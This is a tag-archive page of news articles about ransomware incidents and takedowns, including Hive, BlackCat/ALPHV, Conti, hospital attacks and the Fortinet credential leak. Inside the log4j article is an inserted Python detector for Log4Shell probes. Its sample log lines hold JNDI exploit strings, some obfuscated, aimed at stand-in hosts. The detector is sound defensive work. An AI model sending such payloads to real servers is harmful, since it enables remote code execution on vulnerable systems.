Tag Archives: ransomware

Blackbaud agrees to $49.5 million settlement for ransomware data breach – BleepingComputer

  1. Blackbaud agrees to $49.5 million settlement for ransomware data breach BleepingComputer
  2. Oregon reaches nearly $50M multi-state settlement over 2020 Blackbaud data breach KOIN.com
  3. New Mexico getting over $400,000 in settlement with Blackbaud software company KRQE News 13
  4. Utah AG announcing $600,000 settlement with Blackbaud for data breach ABC4 Utah
  5. INVESTIGATION ALERT: Scott+Scott Attorneys at Law LLP Investigates Blackbaud, Inc.’s Directors and Officers for Breach of Fiduciary Duties – BLKB Business Wire

Read original article here

FBI seizes website used by notorious ransomware gang



CNN —

The FBI has seized the computer infrastructure used by a notorious ransomware gang which has extorted more than $100 million from hospitals, schools and other victims around the world, US officials announced Thursday.

FBI officials since July have had extraordinary access to the so-called Hive ransomware group’s computer networks, FBI Director Christopher Wray said at a news conference, allowing the bureau to pass computer “keys” to victims so that they could decrypt their systems and thwart $130 million in ransom payments.

As of November, Hive ransomware had been used to extort about $100 million from over 1,300 companies worldwide – many of them in health care, according to US officials.

The dark-web website on which Hive listed its victims displayed a message in Russian and English Thursday that it had been taken over “as part of a coordinated law enforcement action” against the group by the FBI, Secret Service and numerous European government agencies.

“Simply put, using lawful means, we hacked the hackers,” Deputy Attorney General Lisa Monaco told reporters.

The Hive ransomware has been particularly rampant in the health care sector. One ransomware attack using Hive malicious software, in August 2021, forced a hospital in the US Midwest to turn away patients as Covid-19 surged, Attorney General Merrick Garland said.

Other reported US victim organizations of Hive include a 314-bed hospital in Louisiana. The hospital said it thwarted a ransomware attack in October, but that the hackers still stole personal data on nearly 270,000 patients.

“Hive compromised the safety and health of patients in hospitals – who are among our most vulnerable population,” said Errol Weiss, chief security officer for the Health Information Sharing and Analysis Center, a cyber threat sharing group for big health care providers worldwide. “When hospitals are attacked and medical systems go down, people can die.”

Thursday’s announcement is the latest in a series of Justice Department efforts to crack down on overseas ransomware groups that lock up US companies’ computers, disrupt their operations and demand millions of dollars to unlock the systems. Justice officials have seized millions of dollars in ransomware payments and urged companies not to pay off the criminals.

The ransomware epidemic grew more urgent for US officials after Colonial Pipeline, the major pipeline operator for sending fuel to the East Coast, shut down for days in May 2021 due to a ransomware attack from a suspected Russian cybercriminal. The disruption led to long lines at gas stations in multiple states as people hoarded fuel.

While the ransomware economy remains lucrative, there are signs that the US and international law enforcement stings are making a dent in the hackers’ earnings. Ransomware revenue fell to about $457 million in 2022, down from $766 million in 2021, according to data from cryptocurrency-tracking firm Chainalysis.

Cybersecurity professionals welcomed the Hive takedown, but some worried that another group would soon fill the void left by Hive.

“The disruption of the Hive service won’t cause a serious drop in overall ransomware activity but it is a blow to a dangerous group that has endangered lives by attacking the healthcare system,” John Hultquist, a vice president at Google-owned cybersecurity firm Mandiant, told CNN.

“Unfortunately, the criminal marketplace at the heart of the ransomware problem ensures a Hive competitor will be standing by to offer a similar service in their absence, but they may think twice before allowing their ransomware to be used to target hospitals,” Hultquist said.

Wray said the FBI would continue to track the people behind Hive ransomware and try to arrest them. It was not immediately clear where those people were located. The Department of Health and Human Services has described Hive as a “possibly Russian speaking” group.

This story has been updated with additional details.


Elden Ring Publisher Hacked, Ransomware Group Claims


Bandai Namco, the Japanese publisher behind the Ace Combat, Dragon Ball Z, and Dark Souls games, appears to be the latest major gaming company to suffer a serious hack. The ransomware group BlackCat added the Elden Ring publisher to its list of victims earlier today, though the extent of the damage and the size of the group’s demand are not yet clear.

“ALPHV ransomware group (alternatively referred to as BlackCat ransomware group) claims to have ransomed Bandai Namco,” vx-underground, a group that monitors malware source code on the web, posted on Twitter Monday. Attached was a screenshot of the ALPHV ransomware blog where the group tracks its targets, with Bandai Namco listed under the threat of “data soon” as of July 11.

Bandai Namco did not immediately respond to a request for comment. Vx-underground has previously reported on other hacks, including the infamous Lapsus$ one, before the companies themselves have confirmed them. The ransomware watch group DarkFeed also shared a screenshot of BlackCat’s claimed hack earlier today. Vx-underground and DarkFeed didn’t immediately respond to a request for comment either.

BlackCat, whose members are believed to have also been involved in the Colonial Pipeline hack last year, has been ramping up ransomware attacks, according to some computer security analysts as well as the FBI. Most recently, the hacks have resulted in BlackCat posting private employee data online when victims refuse to pay up. In the past, the group has demanded millions and has targeted school districts and other public entities in addition to for-profit companies.

If legitimate, this would be just the latest in a long line of recent hacks at major gaming companies. Capcom was hit in late 2020, with several of its upcoming unannounced releases like Dragon’s Dogma 2 leaking at the time. A now famous hack of graphics chip manufacturer Nvidia ended up leaking tons of other big gaming projects like Kingdom Hearts 4. CD Projekt Red, the Polish studio behind The Witcher 3 and Cyberpunk 2077, had employee data and the source code for one of its games stolen in early 2021. Even FIFA publisher Electronic Arts was hit, with the alleged perpetrators trying to get media outlet Vice to blackmail the company on its behalf.

It’s unclear how much of the seeming uptick in security breaches is due to new techniques deployed by hackers vs. the greater challenges companies faced when moving to working from home during the global pandemic. Capcom blamed part of its vulnerability on remote work. At the same time, the blockchain network hosting crypto gaming juggernaut Axie Infinity suffered one of the most expensive hacks in history earlier this year, reportedly all because an employee fell for an elaborate phishing scheme.

Earlier this year, Bandai Namco took the servers for Dark Souls I, II, and III offline after a dangerous remote code execution (RCE) exploit was discovered.

    




Ransomware Group Debuts Searchable Victim Data – Krebs on Security

Cybercrime groups that specialize in stealing corporate data and demanding a ransom not to publish it have tried countless approaches to shaming their victims into paying. The latest innovation in ratcheting up the heat comes from the ALPHV/BlackCat ransomware group, which has traditionally published any stolen victim data on the Dark Web. Today, however, the group began publishing individual victim websites on the public Internet, with the leaked data made available in an easily searchable form.

The ALPHV site claims to care about people’s privacy, but they let anyone view the sensitive stolen data.

ALPHV recently announced on its victim shaming and extortion website that it had hacked a luxury spa and resort in the western United States. Sometime in the last 24 hours, ALPHV published a website with the same victim’s name in the domain, and their logo on the homepage.

The website claims to list the personal information of 1,500 resort employees, and more than 2,500 residents at the facility. At the top of the page are two “Check Yourself” buttons, one for employees, and another for guests.

Brett Callow, a threat analyst with security firm Emsisoft, called the move by ALPHV “a cunning tactic” that will most certainly worry their other victims.

Callow said most of the victim shaming blogs maintained by the major ransomware and data ransom groups exist on obscure, slow-loading sites on the Darknet, reachable only through the use of third-party software like Tor. But the website erected by ALPHV as part of this new pressure tactic is available on the open Internet.

“Companies will likely be more concerned about the prospect of their data being shared in this way than of simply being posted to an obscure Tor site for which barely anyone knows the URL,” Callow said. “It’ll piss people off and make class actions more likely.”

It’s unclear if ALPHV plans to pursue this approach with every victim, but other recent victims of the crime group include a school district and a U.S. city. Most likely, this is a test run to see if it improves results.

“We are not going to stop, our leak distribution department will do their best to bury your business,” the victim website reads. “At this point, you still have a chance to keep your hotel’s security and reputation. We strongly advise you to be proactive in your negotiations; you do not have much time.”

Emerging in November 2021, ALPHV is perhaps most notable for its programming language (it is written in Rust). ALPHV has been actively recruiting operators from several ransomware organizations — including REvil, BlackMatter and DarkSide — offering affiliates up to 90 percent of any ransom paid by a victim organization.

Many security experts believe ALPHV/BlackCat is simply a rebrand of another ransomware group — “Darkside” a.k.a. “BlackMatter,” the same gang responsible for the 2021 attack on Colonial Pipeline that caused fuel shortages and price spikes for several days last summer.

Callow said there may be an upside to this ALPHV innovation, noting that his wife recently heard directly from a different ransomware group — Cl0p.

“On a positive note, stunts like this mean people may actually find out that their PI has been compromised,” he said. “Cl0p emailed my wife last year. The company that lost her data still hasn’t made any public disclosure or notified the people who were impacted (at least, she hasn’t heard from the company.)”


Ransomware gang threatens to overthrow Costa Rica government

SAN JOSE, Costa Rica (AP) — A ransomware gang that infiltrated some Costa Rican government computer systems has upped its threat, saying its goal is now to overthrow the government.

Perhaps seizing on the fact that President Rodrigo Chaves had only been in office for a week, the Russian-speaking Conti gang tried to increase the pressure to pay a ransom by raising its demand to $20 million.

Chaves suggested Monday in a news conference that the attack was coming from inside as well as outside Costa Rica.

“We are at war and that’s not an exaggeration,” Chaves said. He said officials were battling a national terrorist group that had collaborators inside Costa Rica.

Chaves also said the impact was broader than previously known, with 27 government institutions, including municipalities and state-run utilities, affected. He blamed his predecessor Carlos Alvarado for not investing in cybersecurity and for not more aggressively dealing with the attacks in the waning days of his government.

In a message Monday, Conti warned that it was working with people inside the government.

“We have our insiders in your government,” the group said. “We are also working on gaining access to your other systems, you have no other options but to pay us. We know that you have hired a data recovery specialist, don’t try to find workarounds.”

Despite Conti’s threat, experts see regime change as highly unlikely, and doubt that it is even the real goal.

“We haven’t seen anything even close to this before and it’s quite a unique situation,” said Brett Callow, a ransomware analyst at Emsisoft. “The threat to overthrow the government is simply them making noise and not to be taken too seriously, I wouldn’t say.

“However, the threat that they could cause more disruption than they already have is potentially real and that there is no way of knowing how many other government departments they may have compromised but not yet encrypted.”

Conti attacked Costa Rica in April, accessing multiple critical systems in the Finance Ministry, including customs and tax collection. Other government systems were also affected and a month later not all are fully functioning.

Chaves declared a state of emergency over the attack as soon as he was sworn in last week. The U.S. State Department offered a $10 million reward for information leading to the identification or location of Conti leaders.

Conti responded by writing, “We are determined to overthrow the government by means of a cyber attack, we have already shown you all the strength and power, you have introduced an emergency.”

The gang also said it was raising the ransom demand to $20 million. It called on Costa Ricans to pressure their government to pay.

The attack has encrypted government data and the gang said Saturday that if the ransom wasn’t paid in one week, it would delete the decryption keys.

The U.S. State Department statement last week said the Conti group had been responsible for hundreds of ransomware incidents during the past two years.

“The FBI estimates that as of January 2022, there had been over 1,000 victims of attacks associated with Conti ransomware with victim payouts exceeding $150,000,000, making the Conti Ransomware variant the costliest strain of ransomware ever documented,” the statement said.

While the attack is adding unwanted stress to Chaves’ early days in office, it’s unlikely there was anything but a monetary motivation for the gang.

“I believe this is simply a for-profit cyber attack,” Callow, the analyst said. “Nothing more.”


Associated Press writer Christopher Sherman in Mexico City contributed to this report.


Ransomware gang claims it hacked 49ers


A ransomware gang claims it has hacked the 49ers, contending that it has stolen some of the team’s financial data.

Via the Associated Press, the group known as BlackByte posted team documents in a file marked “2020 invoices” on a site on the dark web.

The team has acknowledged a “network security incident” involving some of its corporate IT network systems.

“To date, we have no indication that this incident involves systems outside of our corporate network, such as those connected to Levi’s Stadium operations or ticket holders,” the team said in a statement provided to the AP. This implies that the attack involves systems inside the corporate network, which presumably entails a potentially broad range of information.

The team has said that it notified law enforcement and hired cybersecurity firms to assist in the process.


How quick thinking stopped a ransomware attack from crippling a Florida hospital

The emergency room of Jackson Hospital, a 100-bed facility on Florida’s panhandle, called to report that it couldn’t connect to the charting system that doctors use to look up patients’ medical histories. Jamie Hussey, Jackson Hospital’s IT director, soon realized that the charting software, which was maintained by an outside vendor, was infected with ransomware and that he didn’t have much time to keep the malware from spreading.

The hospital shut down its computer systems on his advice.

“If we hadn’t stopped it, it probably would’ve spread out through the entire hospital,” Hussey said. Hospital staff ditched the electronic records and reverted to pen and paper to keep the hospital running and organized, he said, but patient care wasn’t disrupted.

As Hussey spoke to CNN Tuesday, the hospital’s IT systems were gradually coming online, and he was expecting phone calls from the FBI (which investigates hacking incidents) and Aon, a cybersecurity consultancy that Hussey said was supporting the recovery. He was trying to figure out if the hackers had stolen any hospital data, and if they might need to be paid off to get it back.

The damage could’ve been far worse.

Jackson Hospital is just one of several dozen health care organizations across the US that have had to battle ransomware attacks since the coronavirus pandemic began. The disruptions have cost the sector millions of dollars and prompted urgent calls to hospitals from federal officials to be wary of cybercriminal groups.

One suspected ransomware attack in October 2020 forced the University of Vermont Health Network to delay chemotherapy appointments, while another in August 2021 prompted the emergency room at Memorial Health System in Ohio to divert patients to other facilities.

In the early minutes and hours of a ransomware attack, hospital cybersecurity teams are on the front lines of the response; help from federal agencies like the FBI might come later.

Yet hospitals don’t often publicly discuss how quick thinking and preemptive action can be the difference between containing a hack and having it spiral out of control. For Hussey, it has meant minimal sleep since Sunday, and the weight of a 600-person staff at Jackson depending on his IT team of about a dozen to get hospital computers up and running again.

“The new guy I just hired is a cybersecurity graduate, so we broke him in really early,” he quipped.

A gradual recovery

Though Hussey’s team acted quickly, Jackson Hospital’s IT systems haven’t come away completely unscathed.

The emergency room’s charting system could be offline for the rest of the week, he said. (Doctors have been getting ER patient records from other parts of the hospital network).

The entire hospital had to temporarily switch to what medical professionals call “downtime procedures” — contingency plans after Hussey’s team shut computers down. For several hours, things like physician notes and prescriptions for patients were processed by hand.

The attackers also encrypted a computer server that Jackson Hospital uses to store non-critical organizational documents. Hussey was trying to figure out if there was anything in those files that contained data on Jackson patients and, if so, if the hospital should pay a ransom to get them back (he said he wasn’t aware of any ransom demand from the hackers).

The ransomware that Hussey’s team found on the charting system is known as Mespinoza (also tracked as PYSA) and has racked up 190 victim organizations worldwide across various industries, including several in health care, according to a Department of Health and Human Services advisory on the group last week.

The hacking group is just one of several that haven’t refrained from hitting health care organizations during the pandemic. A study last year by the US Cybersecurity and Infrastructure Security Agency found that ransomware attacks can “lead to significant and sustained” strain on hospitals already reeling from a flood of coronavirus patients.

Allan Liska, senior threat intelligence analyst at cybersecurity firm Recorded Future, said there were 134 publicly reported ransomware incidents involving health care organizations in 2021, up from his 2020 tally of 106 incidents.

But many ransomware attacks don’t make the news.

“I’ve worked with a number of healthcare providers recently that have managed to stop a ransomware attack during the reconnaissance stage,” Liska told CNN. “Sharing this information helps other organizations better understand what they should be looking for and developing better strategies for stopping ransomware.”

‘Lock it down and piss people off’

The recovery process at Jackson Hospital has been meticulous to ensure that malicious code isn’t lingering in some neglected part of the network.

Hussey’s team went down the list of computer systems across the hospital, starting with the most critical, and made sure they weren’t infected with ransomware. They physically disconnected the hospital’s electronic health records system from the rest of the network to check it for malicious code before reconnecting it.

By Wednesday, hospital computers were back online except for the charting systems used by the ER.

Hussey said the decision to shut computer networks down may not be popular with some hospital staff, “but it’s better to be down a day than be down a month.”

“Lock it down and piss people off,” Hussey, who has worked at Jackson for over 25 years, said in a Southern drawl. “It’s what you have to do just to secure your network.”


NASA Denies It Used Log4j in Its Mars Ingenuity Helicopter


Did log4j, the buggy software utility from hell, get NASA’s experimental Mars helicopter hacked? The answer is no: according to NASA, it doesn’t even use the doomed tool.

The Register originally reported that Ingenuity, one of two Mars-based vehicles operated by America’s space agency, uses log4j. In fact, the Apache Software Foundation, which maintains the ubiquitous, vulnerability-ridden tool, apparently tweeted back in June that the space-chopper was “powered by” log4j. (File that under things that haven’t aged particularly well.) Predictably, the tweet has since been deleted but the Wayback Machine shows the evidence.

All that “powered by” business was apparently incorrect, with the foundation telling Futurism that it was “misinformed.”

Log4j, in case you’ve missed it, is a widely used Apache logging library for Java that was recently discovered to be afflicted with serious security vulnerabilities that could easily get you hacked: the headline flaw lets an attacker who can get a crafted string into a log message make the application fetch and run code from a server the attacker controls. It has been used by virtually everyone, from coders at Twitter and Apple to those at Amazon and LinkedIn. But not, apparently, the NASA engineers who built Ingenuity.

Ingenuity, the first powered aircraft to fly on another planet, was launched last year and landed on Mars in February along with its partner, the Perseverance rover. The automated chopper recently took its 17th flight over the surface of the planet, pushing its total time aloft past 30 minutes. However, while the flight was mostly a success, the vehicle temporarily disappeared from NASA’s view after suffering a minor network issue. “The rotorcraft’s status after the Dec. 5 flight was previously unconfirmed due to an unexpected cutoff to the in-flight data stream as the helicopter descended toward the surface at the conclusion of its flight,” the space agency reported, in a recent press release.

Ingenuity’s supposed use of the unfortunate Apache utility, coupled with its recent unexpected data disruption, led some to wonder: Did Apache’s bug get NASA’s space chopper hacked?

Absolutely not, according to NASA, which told Futurism this in a statement: “NASA’s Ingenuity helicopter does not run Apache or log4j nor is it susceptible to the log4j vulnerability. NASA takes cybersecurity very seriously and, for this reason, we do not discuss specifics regarding the cybersecurity of agency assets.”

We’ve reached out to NASA for additional information and will update when we hear back.

That it was even plausible that Ingenuity could have used log4j (pronounced “log for j,” as in “log for Java,” according to its creator) speaks more to its ubiquity than to some mystical off-world hacking incident. And, while the bug-ridden utility did not, according to NASA, have anything to do with Ingenuity, it’s still a huge problem. As companies throughout the world race to patch their systems, cybercriminals are hot on their heels, and are already beginning to cause substantial damage.

The Epic Log4j Bug Saga Continues

Case in point, ransomware gangs are now targeting log4j like there’s no tomorrow. It was reported earlier this week that a new ransomware family dubbed “Khonsari” had been going after vulnerable Windows systems to attempt exploits. Since then, we’ve also seen hackers affiliated with Conti, a well-known ransomware gang, begin targeting vulnerable systems. In fact, the gang may have just attacked McMenamins, the funky brewery/hotel/events franchise based in Portland, Oregon, which reported an attack Friday. Conti is only suspected at this point.

However, ransomware hackers aren’t the only kids on the block taking advantage of this situation. All kinds of exploitation attempts have been seen across the internet, with cybercriminals swarming around the vulnerabilities and trying everything from cryptomining to data theft and everything in between. Additionally, reports of state-backed hacking activity have also popped up, with reports that China, North Korea, Iran, and others are all leveraging the vulnerabilities for their espionage activities.
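Those exploitation attempts leave a recognisable fingerprint in web-server logs, because the attacker has to get a Log4j lookup string into something the application logs. As an added illustration, not code from the original article or from Apache, here is a small Python detector for those probes. It assumes Apache combined log format, the sample lines are constructed (not real traffic), and the `${jndi:...}` pattern and the nested-lookup and URL-encoding obfuscations it unwinds are the documented CVE-2021-44228 tricks, which the article itself does not spell out.

```python
"""Added example: spot Log4Shell (CVE-2021-44228) probes in web-server logs.

The bug fires when a string such as ${jndi:ldap://attacker/x} reaches a Log4j
logger, so attackers stuff it into any field a web app is likely to log
(User-Agent, URL, headers). Real probes obfuscate the keyword with nested
lookups like ${${lower:j}ndi:...} or ${${::-j}${::-n}${::-d}${::-i}:...} and
URL-encoding, so the detector normalises the line before matching.
"""
import re
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no further $, { or } inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A plain JNDI lookup together with the scheme and callback host it points to.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/}\s]+)", re.IGNORECASE)

# Constructed sample lines in Apache combined log format (assumed format;
# these are not real log entries). IPs come from the RFC 5737 documentation ranges.
SAMPLE_LOGS = [
    '10.0.0.5 - - [13/Dec/2021:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [13/Dec/2021:10:01:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.7 - - [13/Dec/2021:10:02:03 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7/x} HTTP/1.1" 400 0 "-" "curl/7.79"',
    '198.51.100.8 - - [13/Dec/2021:10:02:09 +0000] "GET /%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.8%2Fy%7D HTTP/1.1" 404 0 "-" "-"',
    '198.51.100.9 - - [13/Dec/2021:10:02:15 +0000] "POST /login HTTP/1.1" 200 10 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.9/z}"',
]


def _resolve_inner(match):
    """Collapse one innermost lookup to the literal it evaluates to, if we can."""
    body = match.group(1)
    if body.lstrip().lower().startswith("jndi:"):
        return match.group(0)                    # the lookup we are hunting: keep it
    if ":-" in body:                             # ${::-j} or ${env:NOPE:-j} -> default "j"
        return body.rsplit(":-", 1)[1]
    m = re.fullmatch(r"\s*(lower|upper)\s*:(.*)", body, re.IGNORECASE | re.DOTALL)
    if m:                                        # ${lower:J} -> j, ${upper:n} -> N
        return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()
    return match.group(0)                        # unknown lookup: leave untouched


def normalise(text, rounds=10):
    """URL-decode (twice, for double-encoded payloads) and collapse nested
    lookups innermost-first until nothing changes or the round limit is hit."""
    for _ in range(2):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(rounds):
        collapsed = _INNER.sub(_resolve_inner, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi(line):
    """Return (scheme, callback_host) for the first JNDI lookup in the line, else None."""
    m = _JNDI.search(normalise(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan(lines):
    """Return (line_no, client_ip, scheme, callback) for each probing line.
    client_ip is the first field of the combined log format."""
    hits = []
    for n, line in enumerate(lines, start=1):
        found = find_jndi(line)
        if found:
            hits.append((n, line.split(" ", 1)[0], found[0], found[1]))
    return hits


if __name__ == "__main__":
    for line_no, ip, scheme, callback in scan(SAMPLE_LOGS):
        print(f"line {line_no}: {ip} sent {scheme} lookup -> {callback}")
```

The callback host the detector pulls out is the useful part: it is the server the vulnerable application would have contacted, so it belongs in an egress block list and in a search of DNS and proxy logs for any host that actually resolved or connected to it, which is the difference between a probe and a compromise.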

Meanwhile, the federal government took emergency action on Friday to secure itself, issuing an order from the U.S. Cybersecurity and Infrastructure Security Agency to all federal Civilian Executive Branch agencies that mandates they patch the Apache bug within the next six days. CISA director Jen Easterly urged all relevant agencies to “join us in this essential effort.”

Yes, it’s all pretty bad. Only time will tell how big the mess wrought by log4j is, but don’t hold your breath. It’s going to take a while to find out how screwed we all are.




Israeli hospital targeted by ransomware attack

The Hillel Yaffe Medical Center in Hadera was targeted by a ransomware attack that affected its computer systems, the hospital announced on Wednesday.

Since the attack, which occurred without any prior warning, the hospital has been using alternate systems while treating patients, and has been writing patients’ information down by hand. The hospital is operating as normal, except for elective, nonurgent operations. All critical equipment is working as it should, including CT and MRI scanners.

In the meantime, Laniado Medical Center in Netanya is prepared to accept patients who cannot be treated at Hillel Yaffe due to the cyberattack. Hillel Yaffe has asked Magen David Adom and the Health Ministry to bring patients who don’t need urgent care to other hospitals.

The incident has been reported to the ministry and National Cyber Directorate and is being handled by the best experts in the field, according to the hospital. The ministry has updated other hospitals about the incident as a preventive measure.

Health Ministry Director-General Prof. Nachman Ash asked hospitals and HMOs to practice maximum alertness amid concerns that there could be further attacks on additional hospitals or clinics, according to N12. Ash also asked that hospitals and HMOs ensure that they have backups that can be used to ensure the continuity of treatment if further attacks take place.

The Hillel Yaffe hospital in Hadera. (credit: Wikimedia Commons)

Amit Spitzer, chief information security officer at Cato Networks, stated that the incident “raises questions about the fate of the personal medical information of many patients at the hospital.”

Spitzer stressed that in similar cases, the ransom payment didn’t help, and the information was eventually leaked or deleted permanently.

“The prevailing assumption is that the attack was carried out by a hostile party who wants to harm, and the ransom demand is here only ostensibly,” said Spitzer.

“Ransomware attacks are no longer a localized problem of one organization or another, but a global scourge that indiscriminately hits critical infrastructure, medical institutes and many businesses around the world,” said Yossi Rachman, director of security research at Cybereason, in response to the attack.

“When it comes to a targeted attack on hospitals, attackers know to expect a quick response from the attacked organization, due to delays in performing critical medical processes as well as the fear of leaking sensitive medical information about patients,” he said.

Cybereason recommends that every organization adhere to well-proven information security practices, including ensuring software is kept updated, and having clear security procedures and tools for rapid protection and response to information security incidents.

The company recommends not cooperating with the attacks and refraining from paying ransom payments.

The attack is the latest in a long series of cyberattacks on Israel in recent years.

Last week, Cybereason revealed that MalKamak, an Iranian state-supported hacker group, was running a highly targeted cyber-espionage operation against global aerospace and telecommunications companies, stealing sensitive information from targets around Israel and the Middle East, as well as in the United States, Russia and Europe. The threat posed by MalKamak is still active.

Last month, a hacker group called Deus leaked data it claims it obtained, in a cyberattack on the Israeli call center service company Voicenter, from the company’s customers, including 10bis, CMTrading, Mobileye, eToro, Gett and MyHeritage. The data leaked so far include security camera and webcam footage, ID cards, photos, WhatsApp messages and emails, as well as recordings of phone calls.

A series of cyberattacks has plagued Israeli businesses and institutions in the past two years, including Israel Aerospace Industries, the Shirbit insurance company and the Amital software company.

The National Cyber Directorate reported that it handled more than 11,000 inquiries on its 119 hotline in 2020, some 30% more than it handled in 2019. The directorate made about 5,000 requests to entities to handle vulnerabilities exposing them to attacks, and was in contact with about 1,400 entities concerning attempted or successful attacks.

Zev Stub contributed to this report.




Hackers Just Leaked 500,000 Fortinet VPN Users’ Passwords


A hacker gang has allegedly collected and dumped a large trove of approximately 500,000 login credentials belonging to users of a popular VPN product from cybersecurity firm Fortinet.

The threat actor, who goes by the moniker “Orange,” apparently leaked the trove of usernames and passwords on a dark web forum on Tuesday, BleepingComputer has reported. While cybercriminals will often try to sell such data or use it for their own nefarious purposes, Orange apparently posted the large haul for free.

The accounts are believed to have been compromised via a previously disclosed vulnerability in the product. In April, federal agencies warned of multiple security flaws in Fortinet’s VPN that could give attackers access. The company has since issued patches for those flaws, though that apparently did not stop droves of users from having their account information compromised.

According to research from security firm Advanced Intel, Orange is thought to be a member of the ransomware gang “Groove.” They are reputed to have also previously worked for Babuk, a prominent ransomware gang that attempted to extort the Washington D.C. Metropolitan police department for millions of dollars earlier this year.

Groove recently launched a new cybercrime forum called RAMP and researchers have theorized that the gang may have leaked the VPN accounts as a way of drawing attention to their new business venture.

Virtual private networks, meant to protect a user’s confidential data and web activity, can become a privacy nightmare if somebody compromises them. In this case, access to Fortinet VPN accounts would likely allow cybercriminals to infiltrate networks, steal data, or worse. Unfortunately, the threat actor responsible for the leak has claimed that many of the credentials are still valid. That is the practical point for administrators: patching closes the hole, but it does not invalidate credentials that were already harvested from a device before it was patched, so affected accounts need their passwords reset and, ideally, multi-factor authentication enforced on the VPN.

The credentials are reportedly tied to 498,908 users and 12,856 devices, spread across as many as 74 countries. The largest share of credentials comes from India, though Italy, France, and Israel also have sizable shares.

Fortinet, which sells a number of security products, hasn’t yet commented on the leak. We reached out to the company for comment and will update this story if they respond.
